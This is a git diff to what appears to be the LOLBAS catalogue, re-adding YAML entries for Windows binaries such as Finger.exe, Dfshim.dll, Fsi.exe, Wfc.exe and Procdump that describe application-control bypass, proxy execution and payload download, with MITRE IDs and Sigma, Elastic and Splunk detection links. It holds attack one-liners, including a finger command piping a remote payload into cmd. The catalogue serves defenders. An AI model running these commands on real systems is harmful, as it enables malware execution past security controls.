diff --git a/yml/OSBinaries/.AppInstaller.yml.swp b/yml/OSBinaries/.AppInstaller.yml.swp new file mode 100644 index 0000000..93cd402 Binary files /dev/null and b/yml/OSBinaries/.AppInstaller.yml.swp differ diff --git a/yml/OSBinaries/Aspnet_Compiler.yml b/yml/OSBinaries/Aspnet_Compiler.yml index ee23cf7..df6283e 100644 --- a/yml/OSBinaries/Aspnet_Compiler.yml +++ b/yml/OSBinaries/Aspnet_Compiler.yml @@ -1,27 +1,27 @@ ---- -Name: Aspnet_Compiler.exe -Description: ASP.NET Compilation Tool -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u - Description: Execute C# code with the Build Provider and proper folder structure in place. - Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions - Category: AWL Bypass - Privileges: User - MitreID: T1127 - OperatingSystem: Windows 10 -Full_Path: - - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -Code_Sample: - - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder -Detection: - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml -Resources: - - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ - - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8 -Acknowledgement: - - Person: cpl - Handle: '@cpl3h' +--- +Name: Aspnet_Compiler.exe +Description: ASP.NET Compilation Tool +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u + Description: Execute C# code with the Build Provider and proper folder structure in place. + Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions + Category: AWL Bypass + Privileges: User + MitreID: T1127 + OperatingSystem: Windows 10 +Full_Path: + - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe + - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe +Code_Sample: + - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder +Detection: + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml +Resources: + - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ + - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8 +Acknowledgement: + - Person: cpl + Handle: '@cpl3h' diff --git a/yml/OSBinaries/Finger.yml b/yml/OSBinaries/Finger.yml index 4627f7c..936098f 100644 --- a/yml/OSBinaries/Finger.yml +++ b/yml/OSBinaries/Finger.yml @@ -1,30 +1,30 @@ ---- -Name: Finger.exe -Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon -Author: Ruben Revuelta -Created: 2021-08-30 -Commands: - - Command: finger user@example.host.com | more +2 | cmd - Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.' - Usecase: Download malicious payload - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022 -Full_Path: - - Path: c:\windows\system32\finger.exe - - Path: c:\windows\syswow64\finger.exe -Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml - - IOC: finger.exe should not be run on a normal workstation. - - IOC: finger.exe connecting to external resources. -Resources: - - Link: https://twitter.com/DissectMalware/status/997340270273409024 - - Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11) -Acknowledgement: - - Person: Ruben Revuelta (MAPFRE CERT) - Handle: '@rubn_RB' - - Person: Jose A. Jimenez (MAPFRE CERT) - Handle: '@Ocelotty6669' - - Person: Malwrologist - Handle: '@DissectMalware' +--- +Name: Finger.exe +Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon +Author: Ruben Revuelta +Created: 2021-08-30 +Commands: + - Command: finger user@example.host.com | more +2 | cmd + Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.' + Usecase: Download malicious payload + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022 +Full_Path: + - Path: c:\windows\system32\finger.exe + - Path: c:\windows\syswow64\finger.exe +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml + - IOC: finger.exe should not be run on a normal workstation. + - IOC: finger.exe connecting to external resources. +Resources: + - Link: https://twitter.com/DissectMalware/status/997340270273409024 + - Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11) +Acknowledgement: + - Person: Ruben Revuelta (MAPFRE CERT) + Handle: '@rubn_RB' + - Person: Jose A. Jimenez (MAPFRE CERT) + Handle: '@Ocelotty6669' + - Person: Malwrologist + Handle: '@DissectMalware' diff --git a/yml/OSLibraries/Dfshim.yml b/yml/OSLibraries/Dfshim.yml index c16451c..ffec91d 100644 --- a/yml/OSLibraries/Dfshim.yml +++ b/yml/OSLibraries/Dfshim.yml @@ -1,28 +1,28 @@ ---- -Name: Dfshim.dll -Description: ClickOnce engine in Windows used by .NET -Author: 'Oddvar Moe' -Created: 2018-05-25 -Commands: - - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo - Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) - Usecase: Use binary to bypass Application whitelisting - Category: AWL Bypass - Privileges: User - MitreID: T1127 - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 -Full_Path: - - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe - - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe -Code_Sample: - - Code: -Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml -Resources: - - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf - - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe -Acknowledgement: - - Person: Casey Smith - Handle: '@subtee' +--- +Name: Dfshim.dll +Description: ClickOnce engine in Windows used by .NET +Author: 'Oddvar Moe' +Created: 2018-05-25 +Commands: + - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo + Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) + Usecase: Use binary to bypass Application whitelisting + Category: AWL Bypass + Privileges: User + MitreID: T1127 + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +Full_Path: + - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe + - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe +Code_Sample: + - Code: +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml +Resources: + - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf + - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml index a227eaf..91b6b26 100644 --- a/yml/OSScripts/CL_LoadAssembly.yml +++ b/yml/OSScripts/CL_LoadAssembly.yml @@ -1,24 +1,24 @@ ---- -Name: CL_LoadAssembly.ps1 -Description: PowerShell Diagnostic Script -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: '”powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()' - Description: Proxy execute Managed DLL with PowerShell - Usecase: Execute proxied payload with Microsoft signed binary - Category: Execute - Privileges: User - MitreID: T1216 - OperatingSystem: Windows 10 21H1 (likely other versions as well) -Full_Path: - - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 -Code_Sample: - - Code: -Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/ff6c54ded6b52f379cec11fe17c1ccb956faa660/rules/windows/process_creation/proc_creation_win_lolbas_cl_loadassembly.yml -Resources: - - Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ -Acknowledgement: - - Person: Jimmy - Handle: '@bohops' +--- +Name: CL_LoadAssembly.ps1 +Description: PowerShell Diagnostic Script +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: '”powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()' + Description: Proxy execute Managed DLL with PowerShell + Usecase: Execute proxied payload with Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1216 + OperatingSystem: Windows 10 21H1 (likely other versions as well) +Full_Path: + - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 +Code_Sample: + - Code: +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/ff6c54ded6b52f379cec11fe17c1ccb956faa660/rules/windows/process_creation/proc_creation_win_lolbas_cl_loadassembly.yml +Resources: + - Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' diff --git a/yml/OtherMSBinaries/Fsi.yml b/yml/OtherMSBinaries/Fsi.yml index f427c5a..fe18464 100644 --- a/yml/OtherMSBinaries/Fsi.yml +++ b/yml/OtherMSBinaries/Fsi.yml @@ -1,38 +1,38 @@ ---- -Name: Fsi.exe -Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK. -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: fsi.exe c:\path\to\test.fsscript - Description: Execute F# code via script file - Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1059 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) - - Command: fsi.exe - Description: Execute F# code via interactive command line - Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1059 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) -Full_Path: - - Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe - - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe -Code_Sample: - - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 -Detection: - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: Fsi.exe execution may be suspicious on non-developer machines -Resources: - - Link: https://twitter.com/NickTyrer/status/904273264385589248 - - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ -Acknowledgement: - - Person: Nick Tyrer - Handle: '@NickTyrer' - - Person: Jimmy - Handle: '@bohops' +--- +Name: Fsi.exe +Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: fsi.exe c:\path\to\test.fsscript + Description: Execute F# code via script file + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + - Command: fsi.exe + Description: Execute F# code via interactive command line + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe + - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe +Code_Sample: + - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 +Detection: + - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml + - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - IOC: Fsi.exe execution may be suspicious on non-developer machines +Resources: + - Link: https://twitter.com/NickTyrer/status/904273264385589248 + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Nick Tyrer + Handle: '@NickTyrer' + - Person: Jimmy + Handle: '@bohops' diff --git a/yml/OtherMSBinaries/Procdump.yml b/yml/OtherMSBinaries/Procdump.yml index ce3205e..7e8d513 100644 --- a/yml/OtherMSBinaries/Procdump.yml +++ b/yml/OtherMSBinaries/Procdump.yml @@ -1,35 +1,35 @@ ---- -Name: Procdump(64).exe -Description: SysInternals Memory Dump Tool -Author: 'Alfie Champion (@ajpc500)' -Created: '2020-10-14' -Commands: - - Command: procdump.exe -md calc.dll explorer.exe - Description: Loads calc.dll where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created. - Usecase: Performs execution of unsigned DLL. - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. - - Command: procdump.exe -md calc.dll foobar - Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary. - Usecase: Performs execution of unsigned DLL. - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. -Full_Path: - - Path: no default -Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_susp_procdump.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_procdump.yml - - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_procdump.yml - - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml - - IOC: Process creation with given '-md' parameter - - IOC: Anomalous child processes of procdump - - IOC: Unsigned DLL load via procdump.exe or procdump64.exe -Resources: - - Link: https://twitter.com/ajpc500/status/1448588362382778372?s=20 -Acknowledgement: - - Person: Alfie Champion - Handle: '@ajpc500' +--- +Name: Procdump(64).exe +Description: SysInternals Memory Dump Tool +Author: 'Alfie Champion (@ajpc500)' +Created: '2020-10-14' +Commands: + - Command: procdump.exe -md calc.dll explorer.exe + Description: Loads calc.dll where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created. + Usecase: Performs execution of unsigned DLL. + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. + - Command: procdump.exe -md calc.dll foobar + Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary. + Usecase: Performs execution of unsigned DLL. + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. +Full_Path: + - Path: no default +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_susp_procdump.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_procdump.yml + - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_procdump.yml + - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml + - IOC: Process creation with given '-md' parameter + - IOC: Anomalous child processes of procdump + - IOC: Unsigned DLL load via procdump.exe or procdump64.exe +Resources: + - Link: https://twitter.com/ajpc500/status/1448588362382778372?s=20 +Acknowledgement: + - Person: Alfie Champion + Handle: '@ajpc500' diff --git a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml index 4afb3a5..b2d3380 100644 --- a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml +++ b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml @@ -1,30 +1,30 @@ ---- -Name: VisualUiaVerifyNative.exe -Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls. -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: VisualUiaVerifyNative.exe - Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing. - Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1218 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) -Full_Path: - - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe - - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe - - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe -Code_Sample: - - Code: -Detection: - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: As a Windows SDK binary, execution on a system may be suspicious -Resources: - - Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/ - - Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad -Acknowledgement: - - Person: Lee Christensen - Handle: '@tifkin' - - Person: Jimmy - Handle: '@bohops' +--- +Name: VisualUiaVerifyNative.exe +Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: VisualUiaVerifyNative.exe + Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing. + Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1218 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe +Code_Sample: + - Code: +Detection: + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - IOC: As a Windows SDK binary, execution on a system may be suspicious +Resources: + - Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/ + - Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad +Acknowledgement: + - Person: Lee Christensen + Handle: '@tifkin' + - Person: Jimmy + Handle: '@bohops' diff --git a/yml/OtherMSBinaries/Wfc.yml b/yml/OtherMSBinaries/Wfc.yml index 2d084c7..b9de32f 100644 --- a/yml/OtherMSBinaries/Wfc.yml +++ b/yml/OtherMSBinaries/Wfc.yml @@ -1,27 +1,27 @@ ---- -Name: Wfc.exe -Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK). -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: wfc.exe c:\path\to\test.xoml - Description: Execute arbitrary C# code embedded in a XOML file. - Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies - Category: AWL Bypass - Privileges: User - MitreID: T1127 - OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) -Full_Path: - - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe -Code_Sample: - - Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ -Detection: - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: As a Windows SDK binary, execution on a system may be suspicious -Resources: - - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ -Acknowledgement: - - Person: Matt Graeber - Handle: '@mattifestation' - - Person: Jimmy - Handle: '@bohops' +--- +Name: Wfc.exe +Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK). +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: wfc.exe c:\path\to\test.xoml + Description: Execute arbitrary C# code embedded in a XOML file. + Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1127 + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe +Code_Sample: + - Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Detection: + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - IOC: As a Windows SDK binary, execution on a system may be suspicious +Resources: + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Matt Graeber + Handle: '@mattifestation' + - Person: Jimmy + Handle: '@bohops'